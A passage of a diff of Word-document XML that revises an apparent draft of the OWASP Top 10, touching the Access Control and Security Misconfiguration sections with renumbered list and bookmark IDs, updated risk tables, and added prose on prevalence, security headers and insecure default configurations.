+        <w:numPr>
+          <w:numId w:val="1000"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="72" w:name="external-2"/>
+      <w:bookmarkEnd w:id="72"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
       <w:r>
         <w:t xml:space="preserve">CWE Entry 79 on Cross-Site Scripting</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1013"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Do we have a non-vendor reference for this?</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId73">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve">PortSwigger: Client-side template injection</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="66" w:name="a4-access-control"/>
-      <w:bookmarkEnd w:id="66"/>
+      <w:bookmarkStart w:id="74" w:name="a4-access-control"/>
+      <w:bookmarkEnd w:id="74"/>
       <w:r>
         <w:t xml:space="preserve">A4 Access Control</w:t>
       </w:r>
@@ -2889,40 +3016,40 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2934,63 +3061,6 @@
             </w:pPr>
             <w:r>
               <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3001,22 +3071,30 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">Access control is discovered and exploited by manual means, and is not amenable to automated exploitation or discovery. This issue is found in 25% of all assessments. The impact of exploitation is anonymous attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="75" w:name="am-i-vulnerable-to-attack-3"/>
+      <w:bookmarkEnd w:id="75"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Access control is the process of ensuring that users cannot act outside of their role or granted permissions, such that they can only access secured information and functionality that they are explicitly granted access. Commonly, applications fail to enforce access control in a wide variety of ways, but typically this can lead to critical unauthorized information disclosure, modification or destruction of all data within a system, or performing a business function well outside of the limits of the user.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="67" w:name="am-i-vulnerable-to-attack-3"/>
-      <w:bookmarkEnd w:id="67"/>
-      <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
+        <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Common access control vulnerabilities include:</w:t>
@@ -3026,7 +3104,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3038,7 +3116,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3050,7 +3128,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3062,7 +3140,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3074,7 +3152,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3086,7 +3164,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3098,7 +3176,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3137,7 +3215,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1014"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3157,8 +3235,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="68" w:name="how-do-i-prevent-3"/>
-      <w:bookmarkEnd w:id="68"/>
+      <w:bookmarkStart w:id="76" w:name="how-do-i-prevent-3"/>
+      <w:bookmarkEnd w:id="76"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -3175,7 +3253,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3187,7 +3265,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3199,7 +3277,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3211,7 +3289,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3223,7 +3301,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3235,7 +3313,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3247,7 +3325,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3301,7 +3379,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1013"/>
+          <w:numId w:val="1015"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3321,7 +3399,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1014"/>
+          <w:numId w:val="1016"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3333,7 +3411,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1014"/>
+          <w:numId w:val="1016"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3345,7 +3423,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1014"/>
+          <w:numId w:val="1016"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3373,8 +3451,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="69" w:name="example-scenarios-3"/>
-      <w:bookmarkEnd w:id="69"/>
+      <w:bookmarkStart w:id="77" w:name="example-scenarios-3"/>
+      <w:bookmarkEnd w:id="77"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -3419,7 +3497,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1015"/>
+          <w:numId w:val="1017"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3442,7 +3520,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1016"/>
+          <w:numId w:val="1018"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3457,7 +3535,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1016"/>
+          <w:numId w:val="1018"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3480,8 +3558,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="70" w:name="references-3"/>
-      <w:bookmarkEnd w:id="70"/>
+      <w:bookmarkStart w:id="78" w:name="references-3"/>
+      <w:bookmarkEnd w:id="78"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -3490,8 +3568,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="71" w:name="owasp-2"/>
-      <w:bookmarkEnd w:id="71"/>
+      <w:bookmarkStart w:id="79" w:name="owasp-3"/>
+      <w:bookmarkEnd w:id="79"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -3500,11 +3578,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1017"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId72">
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId80">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3517,11 +3595,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1017"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId45">
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId46">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3534,11 +3612,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1017"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId73">
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId81">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3551,11 +3629,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1017"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId74">
+          <w:numId w:val="1019"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId82">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3568,8 +3646,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="75" w:name="external-2"/>
-      <w:bookmarkEnd w:id="75"/>
+      <w:bookmarkStart w:id="83" w:name="external-3"/>
+      <w:bookmarkEnd w:id="83"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -3578,7 +3656,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1018"/>
+          <w:numId w:val="1020"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3595,11 +3673,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1018"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId76">
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId84">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3612,11 +3690,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1018"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId77">
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId85">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3629,11 +3707,11 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1018"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:hyperlink r:id="rId78">
+          <w:numId w:val="1020"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId86">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -3646,8 +3724,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="79" w:name="a5-security-misconfiguration"/>
-      <w:bookmarkEnd w:id="79"/>
+      <w:bookmarkStart w:id="87" w:name="a5-security-misconfiguration"/>
+      <w:bookmarkEnd w:id="87"/>
       <w:r>
         <w:t xml:space="preserve">A5 Security Misconfiguration</w:t>
       </w:r>
@@ -3676,7 +3754,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Threat agents</w:t>
+              <w:t xml:space="preserve">Threat agents/Attack vectors</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3693,7 +3771,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Exploitability</w:t>
+              <w:t xml:space="preserve">Security Weakness</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3710,58 +3788,7 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Prevalance</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Detectability</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Technical Impact</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcBorders>
-              <w:bottom w:val="single"/>
-            </w:tcBorders>
-            <w:vAlign w:val="bottom"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Business Impacts</w:t>
+              <w:t xml:space="preserve">Impacts</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3774,62 +3801,29 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">App Specific</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">EASY</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">COMMON</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">AVERAGE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">SEVERE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">App Specific</w:t>
+              <w:t xml:space="preserve">Access Lvl \</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Exploitability</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Prevalance \</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3842,51 +3836,29 @@
               <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">TBA</w:t>
+              <w:t xml:space="preserve">Even Anonymous attackers access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, frameworks, and custom code. Automated scanners are useful for detecting misconfigurations, use of default accounts or configs, unnecessary services, legacy options etc.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3896,8 +3868,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="80" w:name="am-i-vulnerable-to-attack-4"/>
-      <w:bookmarkEnd w:id="80"/>
+      <w:bookmarkStart w:id="88" w:name="am-i-vulnerable-to-attack-4"/>
+      <w:bookmarkEnd w:id="88"/>
       <w:r>
         <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
       </w:r>
@@ -3913,7 +3885,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3924,7 +3896,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3935,7 +3907,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3946,7 +3918,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3963,7 +3935,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3974,7 +3946,18 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1019"/>
+          <w:numId w:val="1021"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Does the server not send any security directives to client agents (e.g. in headers) or are they not set to secure values?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:numId w:val="1021"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -3994,8 +3977,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="81" w:name="how-do-i-prevent-4"/>
-      <w:bookmarkEnd w:id="81"/>
+      <w:bookmarkStart w:id="89" w:name="how-do-i-prevent-4"/>
+      <w:bookmarkEnd w:id="89"/>
       <w:r>
         <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
@@ -4011,7 +3994,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1020"/>
+          <w:numId w:val="1022"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4022,7 +4005,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1020"/>
+          <w:numId w:val="1022"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4033,7 +4016,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1020"/>
+          <w:numId w:val="1022"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4044,7 +4027,7 @@
     <w:p>
       <w:pPr>
         <w:numPr>
-          <w:numId w:val="1020"/>
+          <w:numId w:val="1022"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4056,8 +4039,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="82" w:name="example-scenarios-4"/>
-      <w:bookmarkEnd w:id="82"/>
+      <w:bookmarkStart w:id="90" w:name="example-scenarios-4"/>
+      <w:bookmarkEnd w:id="90"/>
       <w:r>
         <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
@@ -4096,10 +4079,18 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #5: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="83" w:name="references-4"/>
-      <w:bookmarkEnd w:id="83"/>
+      <w:bookmarkStart w:id="91" w:name="references-4"/>
+      <w:bookmarkEnd w:id="91"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -4108,8 +4099,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="84" w:name="owasp-3"/>
-      <w:bookmarkEnd w:id="84"/>
+      <w:bookmarkStart w:id="92" w:name="owasp-4"/>
+      <w:bookmarkEnd w:id="92"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -4118,7 +4109,7 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1021"/>
+          <w:numId w:val="1023"/>
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
@@ -4135,7 +4126,24 @@
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
-          <w:numId w:val="1021"/>
